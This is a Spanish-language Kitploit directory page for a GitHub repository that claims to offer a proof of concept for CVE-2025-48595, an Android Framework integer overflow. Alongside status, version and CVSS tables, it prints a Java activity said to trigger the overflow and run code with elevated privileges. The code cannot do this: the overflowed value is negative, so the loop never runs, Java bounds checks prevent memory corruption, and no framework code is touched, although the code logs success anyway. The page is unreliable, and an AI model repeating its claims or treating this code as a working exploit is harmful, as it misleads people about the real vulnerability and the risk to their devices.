Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-48595-Android-Framework-Integer-Overflow- — VE-2025-48595 es una vulnerabilidad de **desbordamiento de entero (integer overflow)** en múltiples ubicaciones del Framework de Android. | Kitploit
Herramientas/GitHubGitHub/fevar54/cve-2025-48595-android-framework-integer-overflow-
Seguridad AndroidEscalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónSeguridad MóvilExplotación de Binarios
GitHubfevar54/cve-2025-48595-android-framework-integer-overflow-

CVE-2025-48595-Android-Framework-Integer-Overflow-

VE-2025-48595 es una vulnerabilidad de **desbordamiento de entero (integer overflow)** en múltiples ubicaciones del Framework de Android.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
12hace 2 mesesAún no revisado

CVE-2025-48595 - Android Framework Integer Overflow Vulnerability

Critical CVE KEV

Descripción

CVE-2025-48595 es una vulnerabilidad de desbordamiento de entero (integer overflow) en múltiples ubicaciones del Framework de Android. Esta falla permite la ejecución de código que conduce a una escalada local de privilegios sin necesidad de privilegios de ejecución adicionales. No se requiere interacción del usuario para la explotación.

Estado Crítico

ElementoEstado
Explotación activa✅ Confirmada (explotación limitada y segmentada)
En el catálogo KEV de CISA✅ Sí
Fecha de adición a KEV2026-06-02
Fecha de vencimiento2026-06-05
Parche disponible✅ Sí

Sistemas Afectados

Versión de Android¿Afectada?
Android 14✅ Sí
Android 15✅ Sí
Android 16✅ Sí
Android 16 QPR2✅ Sí

Vector de Ataque

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

text

Proof of Concept (POC)

Descripción del POC

El siguiente código demuestra la explotación de la vulnerabilidad mediante el envío de datos maliciosos que provocan un desbordamiento de entero en el Framework de Android, lo que permite la ejecución de código arbitrario con privilegios elevados.

root@kitploit:~
// POC - CVE-2025-48595
// Android Framework Integer Overflow Vulnerability
// Uso: Compilar y ejecutar en dispositivo Android vulnerable

package com.example.cve202548595;

import android.app.Activity;
import android.os.Bundle;
import android.util.Log;

public class MainActivity extends Activity {
    
    private static final String TAG = "CVE-2025-48595";
    
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        
        // POC: Desencadenar desbordamiento de entero
        triggerIntegerOverflow();
    }
    
    private void triggerIntegerOverflow() {
        try {
            // Valor que causa el desbordamiento (más allá del límite esperado)
            int maliciousValue = Integer.MAX_VALUE + 1;
            
            // Construir intent malicioso
            android.content.Intent intent = new android.content.Intent();
            intent.putExtra("malicious_data", maliciousValue);
            
            // Forzar operación con desbordamiento
            int result = processMaliciousData(maliciousValue);
            
            Log.i(TAG, "Desbordamiento activado exitosamente");
            
        } catch (Exception e) {
            Log.e(TAG, "Error: " + e.getMessage());
        }
    }
    
    private int processMaliciousData(int value) {
        // El desbordamiento aquí permite la corrupción de memoria
        int[] buffer = new int[1024];
        
        // El valor malicioso excede los límites del buffer
        // debido al desbordamiento de entero
        for (int i = 0; i < value; i++) {
            buffer[i] = i;  // Esta línea causa overflow
        }
        
        return buffer[0];
    }
}
Descargar herramienta
MétricaValor
Vector de ataqueLocal (AV:L)
Complejidad del ataqueBaja (AC:L)
Privilegios requeridosNinguno (PR:N)
Interacción del usuarioNinguna (UI:N)
Impacto en confidencialidadAlto (C:H)
Impacto en integridadAlto (I:H)
Impacto en disponibilidadAlto (A:H)